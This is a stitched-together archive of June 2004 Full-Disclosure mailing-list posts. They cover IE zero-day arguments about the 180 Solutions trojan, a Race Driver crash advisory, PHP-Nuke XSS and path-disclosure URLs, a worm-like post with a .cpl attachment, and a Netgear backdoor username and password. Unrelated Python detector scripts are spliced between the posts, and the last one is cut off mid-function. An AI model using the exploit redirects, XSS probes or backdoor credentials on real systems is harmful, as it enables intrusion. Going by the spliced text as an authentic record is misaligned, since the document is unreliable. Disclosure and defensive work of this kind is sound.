arbitrary code (An analysis of the 180 Solutions Trojan)

Hi Jelmer, 
I've read your analysis of the trojan of 180  solutions and noticed the
statement that this issue uses two zero day exploits.
I'm trying to monitor and register IE vulnerabilities and have a strong
feeling I've seen the Location header execution before. 
Just to be sure, are you aware that:
- Liu Die Yu discards the local protocol issue as a refresh issue:
http://www.safecenter.net/UMBRELLAWEBV4/IredirNrefresh/IredirNrefresh-MyPage.htm
- Roozbeh Afrasiabi created a paper about vulnerabilities in IE. One of the
vulnerabilities uses the following statement in the example code :
target.location="ms-its:\\ntshared.chm::/copyright.htm";
The posting to bugtraq can be found at :
http://archives.neohapsis.com/archives/bugtraq/2004-05/0109.html

To me these issues and your URL: issue seem the same and afaik no patches
for these issues had been provided. 

Can you prove me wrong?




Kind regards
Bone Machine





Re: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

2004-06-08 Thread [EMAIL PROTECTED]


Who exactly are you? 

You come barreling into FD several months ago, long after it was 
created. Pissing in your pants to have found a unmoderated new 
mailing list. You run around on a spree posting every piece 
drivel at every possible opportunity. You then latch onto 
bugtraq riding the coat-tails of other peoples message in order 
to get yours approved. Now I see you have insinuated yourself 
into the Risks Digest 23.41 with perhaps a record 3 messages in 
one go.

Somebody spends there time and effort analysing a zero day, you 
then have the fucking nerve to complain about that:



and then you further demonstrate your cockeyed thought process 
by thinking Jelmer has given you a moments thought and has 
also 'dragged personal issues and flames into "the thread"'



"the thread" being his analysis of the zero day that you stuck 
your fat face into in the first place.

Like I said go start yet 'another' mailing list if you are so 
desparate for attention. You can be the moderator, the only 
poster, the king of the hill, everything you want to be. 



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Harlan Carvey
Bill,

From your post, you don't seem to have a great deal of
detailed information to share about this issue...
 
> The virus works on port 443. 

Wouldn't it then be, by definition, a worm?

> It seems to accept inbound connections on that
> port as well and, presumably, awaits for commands
> from some series of
> servers elsewhere. Perhaps taking orders? 

What information do you have to support this
assumption?

> I also captured some of the
> traffic and attempted to analyze it up but it looks
> like -- you heard it
> here first, folks -- the payload is encrypted!

If this worm runs over SSL, as you say, then wouldn't
you expect it to be encrypted?  

> Is this the first of a coming
> storm of crypto viruses we've all been eagerly
> fearing? 

Is it?
http://www.us-cert.gov/current/current_activity.html#pct

http://www.cert.org/advisories/CA-2002-27.html

To be totally honest, Bill, I don't see a great deal
of information in your post that supports any of your
assertions/assumptions.  If this thing is spreading
the way you say it is, then it's a worm.  

Regardless, there isn't any information in your post
that clearly shows that this worm infects both Windows
and Unix hosts.  In fact, one thing that does seem
clear in your post is that you haven't collected any
information from the "infected" hosts, but rather all
you've got so far is network traffic via
Ethereal...and to be honest, any worm running over SSL
is going to be encrypted...
 
> At any rate, this is your heads up, folks! You heard
> it here first! Be on
> the lookout for this first, very nasty CRYPTO VIRUS!

Thanks.  Noted.



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Billy B. Bilano
Steve,

Sorry to say but it is not! I checked my incoming traffic again this morning
and the attack on port 443 is still coming in full steam ahead! I don't know
what's going on, but I am about to block that port on my firewall. Some
nitwit (probably the idiot that was here before I became IT Director)
somehow, for some reason, deliberately opened port 443 on the firewalls!

I am beginning to think that this is the first wave of the new coming global
crypto-storm!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "-, Steve" <--->
To: "Billy B. Bilano" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 11:34 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Please tell me this is just a really bad joke?
>
> -Original Message-
> From: Billy B. Bilano
> [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, June 08, 2004 10:53 AM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
> Salutations, amigos!
>



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered !

2004-06-08 Thread Billy B. Bilano
Mike,

I don't see anything funny about it! We could be looking at a virus the
likes of which we have never, ever seen before!

Hackers and scripter kiddies are getting crazier by the day! It was only a
matter of time until one of them unleashed the powers of the crypto!



Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "Michael R."
To: "'Billy B. Bilano'" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 11:42 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered !


> You are truly hilarious.
>
> I am still trying to stand up after reading this!
>
>



[Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Billy B. Bilano
Salutations, amigos!

Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!

I was sitting at my desk doing more research on the OPENBSD virus I
discovered last week. I was watching ethereal and monitoring the traffic
coming in and out of the facility and I saw a ton of traffic coming straight
for our web servers! The routers, firewalls, and intrusion detraction
systems were not sounding the red alarms like they should have been (we'll
get to THAT one later).

There appears to be a new virus in town and it's affecting Windows and UNIX
web servers! I have not identified a pattern of infection yet but the virus
is clearly advancing but it only affects web servers!

The virus works on port 443. It seems to accept inbound connections on that
port as well and, presumably, awaits for commands from some series of
servers elsewhere. Perhaps taking orders? I also captured some of the
traffic and attempted to analyze it up but it looks like -- you heard it
here first, folks -- the payload is encrypted! Is this the first of a coming
storm of crypto viruses we've all been eagerly fearing? (I have already sent
a copy of the payload to the distributed.net people so they can try to use
some of those wasting cycles to decipher it like they did the last one!)

I have taken the liberty of naming the virus already. I looked in
etc/services and saw that this port is for and it is something called "ssl"
so I am calling it w32.ssl.b (b for bilano, since I discovered this wretched
thing!)

I called in our webmaster and showed him the data. He is either too stupid
to know what's going on or he takes me for a fool. I got him in the
conference room and showed him the print outs. He tried to convince me it
was not a virus and just normal web traffic but web traffic is on port 80!
No fooling old Bill! LOL! So I told him to gather his stuff up and gave him
his marching orders. I have no time for this kind of bull, what with the
OPENBSD virus last week (still picking up the pieces there). He must have
known I was on to him because he was just laughing on his way out the front
door. He may have even been involved with the infection! Good riddance,
chump!

At any rate, this is your heads up, folks! You heard it here first! Be on
the lookout for this first, very nasty CRYPTO VIRUS!

P.S. I wonder if this virus was from a spam-gang?!

P.P.S. Check out my bloglog in my sig!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS




[Full-Disclosure] Various crashes and fun in Race Driver 1.20

2004-06-08 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  http://www.codemasters.com/tocaracedriver/
Versions: <= 1.20
Platforms:Windows
Bugs: various crashes and spoofed messages
Risk: medium
Exploitation: remote, versus server and attached clients
Date: 08 June 2004
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:http://aluigi.altervista.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


Race Driver is a great and funny driving game developed by Codemasters
and released in March 2003.
Actually this game is no longer supported due to the release of Race
Driver 2 in April 2004.


###

===
2) Bugs
===


Important note: the attacker MUST have access to the server (so if the
  server is protected by password the attacker must know it) and the
  bugs can be exploited ONLY when the server is in the lobby stage
  (openplaying), which is the only moment when players can join.

--
A] Multi crash
--

If a server receives a message packet with a length identifier of 0
it will crash immediately after the access to a NULL pointer.
All the attached clients will crash too.


---
B] Server disconnection
---

A malformed packet can stop the remote match in a couple of seconds.


---
C] Spoofed messages
---

The communication protocol used by the game permits sending messages
to the server without really being in the match, and with the other
players in the server as their sources.
In fact each player is identified by an ID (for example the admin
always has ID 0) and this value can be customized in the message packet.

The message flooding attack during the race is very boring... moreover
for the server's bandwidth.


###

===
3) The Code
===


http://aluigi.altervista.org/poc/rdboom.zip


###

==
4) Fix
==


No fix.
Unfortunately the game is no longer supported.


###


--- 
Luigi Auriemma
http://aluigi.altervista.org



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread madsaxon
At 10:53 AM 6/8/2004 -0500, Billy B. Bilano wrote:
Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!
Anyone else notice that it's getting harder and harder to tell
F-D from The Onion?
;-)
m5x


[Full-Disclosure] Yet another Bank-e-mail-you-name-it scam...

2004-06-08 Thread Chontzopoulos Dimitris
FYI,


Cheers to all




[Full-Disclosure] RE: Multiple vulnerabilities PHP-Nuke

2004-06-08 Thread Jeruvy
This does not apply to any site that has applied the security fixes
available for many, many months.  This is only affecting phpnuke.org
distros, not any 'modified' or 'secured' distro, like betaNC, CPG-NUKE,
and others...

No additional patches dealing with the specifics below were applied to
PHP-Nuke 7.0, only the security patches.

A. Generates a proper ACCESS DENIED page, no PATH DISCLOSURE.  
-
RESULT:

"You are trying to access a restricted area.

We are Sorry, but this section of our site is for Registered Users Only.
You can register for free by clicking here, then you can
access this section without restrictions. Thanks."

B. No CSS exploit.  Same result as above.  Below example was sanitized
prior to GET:


RESULT:

modules.php?name=Reviews&rop=postcomment&id='%3Ch1%3EDarkBicho%3C/h1&title=a
modules.php?name=Reviews&rop=postcomment&id='&title=%3Ch1%3EDarkBicho%3C/h1%3E


So as long as you've addressed the age-old bugs that still haven't been
fixed in the basic PHP-Nuke distros then you may be vulnerable.
However these methods have long been squashed in patches available, and
do not affect newer, secure distros such as betaNC or CPG-Nuke.

Again, I added no new patches to test these potentials in the last 30
days.  And they simply are not a factor.

Sincerely,

J.
j e r u v y a t s h a w d o t c a 


-Original Message Below-
From: Dark Bicho [mailto:[EMAIL PROTECTED] 
Sent: Monday, June 07, 2004 3:31 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Multiple vulnerabilities PHP-Nuke


original advisory : http://bichosoft.webcindario.com/advisory-05.txt


-

:.: Multiple vulnerabilities PHP-Nuke :.:

  PROGRAM: PHP-Nuke
  HOMEPAGE: http://phpnuke.org/
  VERSION: 6.x, 7.2, 7.3
  BUG: Multiple vulnerabilities
  DATE:  14/05/2004
  AUTHOR: DarkBicho
  web: http://www.darkbicho.tk
  team: Security Wari Proyects 
  Email: [EMAIL PROTECTED]


-


1.- Affected software description:
-

PHP-Nuke is a popular content management system, written in PHP by
Francisco Burzi.

2.- Vulnerabilities:
---

A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive 
information.

:.: Examples:


http://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='DarkBicho

Warning: date(): Windows does not support dates prior to midnight (00:00:00),
January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on line 527

B. Cross-Site Scripting aka XSS:

:.: id :

* http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a

* http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='DarkBicho

* http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=DarkBicho


3.- SOLUTION:
 
Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
Check the PHP-NUKE website for updates and official release details.


4.- Greetings:
-

greetings to my Peruvian group swp and perunderforce :D
"PISCO IS AND WILL BE PERUVIAN"


5.- Contact
---

WEB: http://www.darkbicho.tk
EMAIL: [EMAIL PROTECTED]


-

Security Wari Projects
  (c) 2002 - 2004
Made in Peru

[ EOF ]--

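A check for the two behaviours argued over above (the full path disclosure and the reflected markup in the Reviews module), as an added example that is not part of Jeruvy's post, DarkBicho's advisory or PHP-Nuke itself. It does not contact a server: the sample responses are constructed from the outputs quoted in the thread (the "restricted area" page Jeruvy saw and the date() warning in section 2.A of the advisory), so it runs offline. The `<h1>DarkBicho</h1>` marker is the one Jeruvy's sanitized URLs carry, and `probe_urls` only builds the advisory's request URLs for a base URL you supply.

```python
"""Classify PHP-Nuke Reviews-module responses for path disclosure and reflected markup.

Added example; not code from the advisory, from Jeruvy, or from PHP-Nuke.
The sample responses are constructed from the outputs quoted in the thread.
"""
import html
import re
from urllib.parse import quote

PROBE = "<h1>DarkBicho</h1>"   # the marker Jeruvy's sanitized URLs carry

# A PHP warning/notice that names a script path and line number, e.g.
# "... in c:\appserv\www\nuke1\modules\Reviews\index.php on line 527".
# The optional <b> tags cover html_errors=On output as well as plain text.
PHP_PATH_RE = re.compile(
    r"\b(?:Warning|Notice|Fatal error)\b.*?\bin\s+(?:<b>)?"
    r"(?P<path>(?:[A-Za-z]:\\|/)[^\s<]+)(?:</b>)?\s+on\s+line\s+(?:<b>)?(?P<line>\d+)",
    re.IGNORECASE | re.DOTALL,
)


def probe_urls(base):
    """The advisory's three request URLs for a given install (marker URL-encoded)."""
    ep = base.rstrip("/") + "/modules.php?name=Reviews&rop="
    q = quote(PROBE, safe="")
    return {
        "path_disclosure": ep + "showcontent&id='DarkBicho",
        "xss_id": ep + "postcomment&id='" + q + "&title=a",
        "xss_title": ep + "postcomment&id='&title=" + q,
    }


def path_disclosure(body):
    """Return the filesystem path a PHP error message leaks, or None."""
    m = PHP_PATH_RE.search(body)
    return m.group("path") if m else None


def reflected_unescaped(body, marker=PROBE):
    """True if the marker came back verbatim; an HTML-escaped echo does not count."""
    return marker in body


def classify(body):
    """Summarise one response: leaked path, raw reflection, or the access-denied page."""
    return {
        "path_disclosure": path_disclosure(body),
        "reflected_xss": reflected_unescaped(body),
        "access_denied": "restricted area" in body.lower(),
    }


# Constructed sample responses (not captured traffic):
# the patched install's denial page that Jeruvy quotes ...
PATCHED = ("<p>You are trying to access a restricted area.</p>"
           "<p>We are Sorry, but this section of our site is for "
           "Registered Users Only.</p>")
# ... the date() warning from section 2.A of the advisory ...
UNPATCHED_PATH = ("Warning: date(): Windows does not support dates prior to midnight "
                  "(00:00:00), January 1, 1970 in "
                  "c:\\appserv\\www\\nuke1\\modules\\Reviews\\index.php on line 527")
# ... and a comment form that echoes the title parameter raw versus escaped.
UNPATCHED_XSS = '<input type="text" name="title" value="' + PROBE + '">'
ESCAPED_XSS = '<input type="text" name="title" value="' + html.escape(PROBE) + '">'

if __name__ == "__main__":
    for url in probe_urls("http://localhost/nuke1").values():
        print(url)
    for label, body in [("patched", PATCHED), ("path", UNPATCHED_PATH),
                        ("xss", UNPATCHED_XSS), ("escaped", ESCAPED_XSS)]:
        print(label, classify(body))
```

The path regex is what separates the two outcomes in the thread: Jeruvy's patched install returns the denial page and yields no path, while the advisory's install leaks `c:\appserv\www\nuke1\...`. An escaped echo of the marker is reported as not reflected, which is the distinction between a sanitized distro and a raw one.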


Re: [Full-Disclosure] [CYSA-0329] Password recovery vulnerability in FoolProof Security 3.9.x for Windows 95/9

2004-06-08 Thread Michael Kurz
[EMAIL PROTECTED] schrieb:
>  hex_temp[2],/* Temporary storage for hexadecimal conversion */

must be hex_temp[3]


Re: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

2004-06-08 Thread Gadi Evron
Michael Evanchik wrote:
Although this ms-its exploit has been around, the true author of finding this is an 
UNKNOWN author.  I remember when it was _reported_ by Thor but he did not take credit. 
 As for it being 0-day.  It sure is.  None of Microsoft's patches stop it nor did 
Norton AntiVirus Corp.  I have no idea who you are Gadi to give such comments like 
that.
Michael Evanchik
I am the guy who gave what information he has, and asked for 
clarifications on the 0-day issue.

Where Jelmer and I disagree is on dragging  personal issues and flames 
into the thread.

Gadi.


RE: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

2004-06-08 Thread Jelmer

This new exploit is unrelated to the ms-its exploit.

I could just as easily have done

response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm");

and there would be no ms-its protocol handler used in it. It's just a local
resource it loads; it could be an htm file, a resource file, an ms-its file,
whatever.

-Original Message-
From: Michael Evanchik
[mailto:[EMAIL PROTECTED] 
Sent: Tuesday, June 8, 2004 15:29
To: Gadi Evron; Jelmer
Cc: [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Re:
Internet explorer 6 execution of arbitrary code (An analysis of the 180
Solutions Trojan)

Although this ms-its exploit has been around, the true author of finding this
is an UNKNOWN author.  I remember when it was _reported_ by Thor but he did not
take credit.  As for it being 0-day.  It sure is.  None of Microsoft's patches
stop it nor did Norton AntiVirus Corp.  I have no idea who you are Gadi to give
such comments like that.

Michael Evanchik
www.MichaelEvanchik.com

- Original Message - 
From: Gadi Evron 
To: Jelmer 
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Monday, June 07, 2004 4:47 PM
Subject: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code
(An analysis of the 180 Solutions Trojan)

Comments inline.

Jelmer wrote:

> Just when I though it was save to once more use internet explorer I received
> an email bringing my attention to this webpage
> http://216.130.188.219/ei2/installer.htm that according to him used an
> exploit that affected fully patched internet explorer 6 browsers. Being
> rather skeptical I carelessly clicked on the link only to witness how it
> automatically installed addware on my pc!!!

So, you just clicked on the link which was reported as unsafe, did you? :)

Those protocol handlers always seem to cause problems and it's not just 
on Windows, Apple has had just as many problems in dealing with these 
for OS X. If it's not a lack of input validation then it is a lack of 
zone restrictions, perhaps the entire concept of higher privileged zones 
of any kind should be abandoned.

Are these really new vulnerabilities or just variants of old? The 
"Location: URL:" proxy really just looks like the "Location: File:" 
proxy that Liu Die Yu reported and the object caching stuff really just 
looks like a variation of the advisories from GreyMagic back in 2002 
with the showModalDialog caching and javascript: injection. Other than 
those 2, the only real vulnerability on the page is the Ibiza chm stuff 
which still works on plenty of fully patched machines.

> Now there had been reports about 0day exploits making rounds for quite some
> time like for instance this post
>  
> http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0


Why is this a 0-day? Are you trying to start a holy war here? Please 
explain why this is a 0-day if you make such claims.

> However I hadn't seen any evidence to support this up until now
> Thor Larholm as usual added to the confusion by deliberately spreading
> disinformation as seen in this post
>  
> http://seclists.org/lists/bugtraq/2004/May/0153.html

Thor? Spreading disinformation?

> Attributing it to and I quote "just one of the remaining IE vulnerabilities
> that are not yet patched"

That sounds about right.

> I've attempted to write up an analysis that will show that there are at
> least 2 new and AFAIK unpublished vulnerabilities (feel free to proof me
> wrong) out there in the wild, one being fairly sophisticated 

I, personally, appreciate any serious research work, but why put down a 
colleague while you're at it?

> You can view it at:
> 
> http://62.131.86.111/analysis.htm
> 
> Additionally you can view a harmless demonstration of the vulnerabilities at
> 
> http://62.131.86.111/security/idiots/repro/installer.htm
> 
> Finally I also attached the source files to this message

If this really was a 0-day, isn't that a tad irresponsible?

As to Thor...

You are claiming that he is deliberately spreading disinformation, but 
then you proceed to verify his claims.

Are you sure you don't just have a personal vendetta against him?
I don't see what's wrong with him pitching his product (Quik-Fix (?)) 
when reporting his research. That's how the industry work.

You do research and advertise the company that did it, and what solution 
it offers.
Working for free doesn't put food on the table and he has a product that 
might actually protects against such issues. What's next, you will 
complain about AV companies who say they detect a virus or security 
researchers that get paid to work instead of living off the street 
credit from the security mailing lists? Maybe you just don't like 
companies of any kind.

As to the research itself...

Thor went through the hnc3k.com website and listed all the pages and 
vulnerabilities on it, which sounds lik
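Jelmer's point at the top of this message, that the `Location:` value can wrap a local resource in a `URL:` prefix, suggests a simple check on the proxy or server side of the exchange: parse each redirect, strip the wrapper, and look at the scheme that is actually left. The following is an added example (not Jelmer's, Gadi's or Thor's code, and not part of the analysis they discuss) that runs over constructed HTTP response heads; the set of schemes it treats as local is my own choice and includes the ones named in the thread (`res:`, `ms-its:`, `file:`).

```python
"""Flag HTTP redirects whose target, once a 'URL:' wrapper is stripped, is a local-resource scheme.

Added example; the responses below are constructed, not captured from the
pages discussed in the thread.
"""
import re

# Schemes that resolve to local content rather than a remote site. This list is
# an assumption of the example; the thread names res:, ms-its: and file:.
LOCAL_SCHEMES = {"res", "ms-its", "its", "mk", "file", "mhtml"}

# One or more "URL:" prefixes (the wrapper used in the redirect Jelmer quotes).
WRAPPER_RE = re.compile(r"^(?:url:\s*)+", re.IGNORECASE)
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def effective_scheme(location):
    """Scheme the client will dispatch on after unwrapping; None for relative targets."""
    target = WRAPPER_RE.sub("", location.strip())
    m = SCHEME_RE.match(target)
    if m is None:
        return None
    scheme = m.group(1).lower()
    # A single letter before the colon is a drive letter, i.e. a local path.
    return "file" if len(scheme) == 1 else scheme


def is_local_zone_redirect(location):
    return effective_scheme(location) in LOCAL_SCHEMES


def scan_response(raw):
    """Parse a raw HTTP response head and report each Location header it carries."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    findings = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            value = value.strip()
            findings.append({
                "status": lines[0],
                "location": value,
                "scheme": effective_scheme(value),
                "suspicious": is_local_zone_redirect(value),
            })
    return findings


def scan_all(raws):
    return [f for raw in raws for f in scan_response(raw)]


# Constructed response heads (not captured traffic).
SAMPLES = [
    "HTTP/1.1 302 Found\r\nLocation: URL:res://shdoclc.dll/HTTP_501.htm\r\n\r\n",
    "HTTP/1.1 302 Found\r\nLocation: url: ms-its:C:\\WINDOWS\\Help\\ntshared.chm::/copyright.htm\r\n\r\n",
    "HTTP/1.1 302 Found\r\nLocation: C:\\WINDOWS\\system32\\calc.exe\r\n\r\n",
    "HTTP/1.1 302 Found\r\nLocation: URL:http://example.invalid/landing.htm\r\n\r\n",
    "HTTP/1.1 302 Found\r\nLocation: /relative/landing.htm\r\n\r\n",
]

if __name__ == "__main__":
    for f in scan_all(SAMPLES):
        print(f)
```

The wrapper is stripped before the scheme is read, so `URL:http://...` is reported as an ordinary remote redirect while `URL:res://...` is not; a bare drive letter is folded into `file`, since a redirect to `C:\...` is just as local as one that spells the scheme out.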

Re: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

2004-06-08 Thread Michael Evanchik

Although this ms-its exploit has been around, the true author of finding this
is an UNKNOWN author.  I remember when it was _reported_ by Thor but he did not
take credit.  As for it being 0-day.  It sure is.  None of Microsoft's patches
stop it nor did Norton AntiVirus Corp.  I have no idea who you are Gadi to give
such comments like that.

Michael Evanchik

www.MichaelEvanchik.com 

  - Original Message - 
  From: 
  Gadi Evron 
  To: Jelmer 
  Cc: [EMAIL PROTECTED] ; [EMAIL PROTECTED] 
  ; [EMAIL PROTECTED] 
  Sent: Monday, June 07, 2004 4:47 PM
  Subject: [Full-Disclosure] Re: Internet 
  explorer 6 execution of arbitrary code (An analysis of the 180 Solutions 
  Trojan)
  Comments inline.

  Jelmer wrote:

  > Just when I though it was save to once more use internet explorer I received
  > an email bringing my attention to this webpage
  > http://216.130.188.219/ei2/installer.htm that according to him used an
  > exploit that affected fully patched internet explorer 6 browsers. Being
  > rather skeptical I carelessly clicked on the link only to witness how it
  > automatically installed addware on my pc!!!

  So, you just clicked on the link which was reported as unsafe, did you? :)

  Those protocol handlers always seem to cause problems and it's not just on
  Windows, Apple has had just as many problems in dealing with these for OS X.
  If it's not a lack of input validation then it is a lack of zone
  restrictions, perhaps the entire concept of higher privileged zones of any
  kind should be abandoned.

  Are these really new vulnerabilities or just variants of old? The "Location:
  URL:" proxy really just looks like the "Location: File:" proxy that Liu Die
  Yu reported and the object caching stuff really just looks like a variation
  of the advisories from GreyMagic back in 2002 with the showModalDialog
  caching and javascript: injection. Other than those 2, the only real
  vulnerability on the page is the Ibiza chm stuff which still works on plenty
  of fully patched machines.

  > Now there had been reports about 0day exploits making rounds for quite some
  > time like for instance this post
  >
  > http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0

  Why is this a 0-day? Are you trying to start a holy war here? Please
  explain why this is a 0-day if you make such claims.

  > However I hadn't seen any evidence to support this up until now
  > Thor Larholm as usual added to the confusion by deliberately spreading
  > disinformation as seen in this post
  >
  > http://seclists.org/lists/bugtraq/2004/May/0153.html

  Thor? Spreading disinformation?

  > Attributing it to and I quote "just one of the remaining IE vulnerabilities
  > that are not yet patched"

  That sounds about right.

  > I've attempted to write up an analysis that will show that there are at
  > least 2 new and AFAIK unpublished vulnerabilities (feel free to proof me
  > wrong) out there in the wild, one being fairly sophisticated

  I, personally, appreciate any serious research work, but why put down a
  colleague while you're at it?

  > You can view it at:
  >
  > http://62.131.86.111/analysis.htm
  >
  > Additionally you can view a harmless demonstration of the vulnerabilities at
  >
  > http://62.131.86.111/security/idiots/repro/installer.htm
  >
  > Finally I also attached the source files to this message

  If this really was a 0-day, isn't that a tad irresponsible?

  As to Thor...

  You are claiming that he is deliberately spreading disinformation, but then
  you proceed to verify his claims.

  Are you sure you don't just have a personal vendetta against him?
  I don't see what's wrong with him pitching his product (Quik-Fix (?)) when
  reporting his research. That's how the industry work.

  You do research and advertise the company that did it, and what solution it
  offers.
  Working for free doesn't put food on the table and he has a product that
  might actually protects against such issues. What's next, you will complain
  about AV companies who say they detect a virus or security researchers that
  get paid to work instead of living off the street credit from the security
  mailing lists? Maybe you just don't like companies of any kind.

  As to the research itself...

  Thor went through the hnc3k.com website and listed all the pages and
  vulnerabilities on it, which sounds like an exhaustive task to me. But
  didn't you do the same and when analyzing the 180 solutions Trojan pages?
  It sounds pretty exhaustive as well.
  The difference is that Thor also told you how to protect against this, by
  locking down the My Computer zone. I can't see anywhere that Thor was
  referring to the object caching vulnerability you are listing as new. In my
  mind, he was referring to the old Unpatched page that he used to maintain
  and that would mean he said some of those are still not patched.
  I miss that page. It was very good.
  We know that Ibiza still works and that there are still problems with the

Re: [sb] RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

2004-06-08 Thread BoneMachine
Hi Jelmer, 
I've read your analysis of the trojan of 180  solutions and noticed the statement that 
this issue uses two zero day exploits.
I'm trying to monitor and register IE vulnerabilities and have a strong feeling I've 
seen the Location header execution before. 
Just to be sure, are you aware that:
- Liu Die Yu discards the local protocol issue as a refresh issue:
http://www.safecenter.net/UMBRELLAWEBV4/IredirNrefresh/IredirNrefresh-MyPage.htm
- Roozbeh Afrasiabi created a paper about vulnerabilities in IE. One of the 
vulnerabilities uses the following statement in the example code :
target.location="ms-its:\\ntshared.chm::/copyright.htm";
The posting to bugtraq can be found at : 
http://archives.neohapsis.com/archives/bugtraq/2004-05/0109.html

To me these issues and your URL: issue seem the same and afaik no patches for these 
issues had been provided. 

Can you prove me wrong?

Kind regards
Bone Machine

---
"hip hip hip" - The Pixies



[Full-Disclosure] Incoming message

2004-06-08 Thread Cm

Alive_condom.cpl
Description: Binary data


Re: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability

2004-06-08 Thread Rip Toren
Quoting Jan Jungnickel <[EMAIL PROTECTED]>:

> On Tue, Jun 08, 2004 at 10:05:56AM +0200, [EMAIL PROTECTED] wrote:
> 
> > >Netgear has 'fixed' this by changing the username and
> > >password to something else. 
> > I heard the username has been changed to "superman" with the
> > password "21241036". I wonder whose phone number THIS is...
> 
> Precisely. I'm pretty stunned by this blatant example of
> stupidity :/
> 
> -- 
> carmunity.com GmbH  Mary-Astell-Strasse 2
> Jan Jungnickel  28359 Bremen

  Depending upon how the account name and password are stored, this might have been as
simple as a binary edit of the firmware, with some checksum cleanup. Unfortunately, it
would only take a couple of hours to completely hide any literal values from a 'strings'
search.

  Even if another firmware is released, and it shows no strings, can it be assured that
the account data has not just been hidden? This might also mean that the V2 product is
also compromised, but with masked account data... who knows?

  Since they seem to have demonstrated a corporate commitment to 'backdoor' their product,
it might be time to find a more customer friendly supplier. At least until there is some
public statement by NetGear about the situation.

   I care, I used one of these; until 10 minutes ago.

-- 
Rip Toren
Senior Information Assurance Engineer
Futures Inc.
email: [EMAIL PROTECTED]
website:  http://www.futures-inc.com



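Rip Toren's caveat above, that a literal credential can be hidden from a `strings` search in a couple of hours, is the reason a firmware audit should look for a known credential under the cheap transforms as well as in the clear. The following is an added example, not Netgear code and not derived from any WG602 image: the firmware blob is constructed (padding, one filler string, the username in the clear, the password XOR-obfuscated), and the credential pair is the "superman" / "21241036" that the thread reports, used here only as sample input.

```python
"""Search a firmware image for a credential under the cheap transforms that defeat `strings`.

Added example, not Netgear code and not derived from any WG602 image. FIRMWARE
below is constructed: padding, one filler string, the username in the clear and
the password XOR-obfuscated; the credential pair is the one the thread mentions.
"""
import re


def printable_strings(blob, min_len=4):
    """What `strings -n <min_len>` would print: runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def candidate_encodings(needle):
    """(label, bytes) pairs for the transforms a developer might use to hide a literal."""
    raw = needle.encode("ascii")
    yield "plain", raw
    yield "utf-16le", needle.encode("utf-16-le")
    yield "reversed", raw[::-1]
    for key in range(1, 256):
        yield "xor-%#04x" % key, xor_bytes(raw, key)
    for shift in range(1, 256):
        yield "add-%d" % shift, bytes((b + shift) & 0xFF for b in raw)


def find_credential(blob, needle):
    """Every (label, offset) at which some encoding of `needle` occurs in `blob`."""
    hits = []
    for label, enc in candidate_encodings(needle):
        start = 0
        while True:
            pos = blob.find(enc, start)
            if pos == -1:
                break
            hits.append((label, pos))
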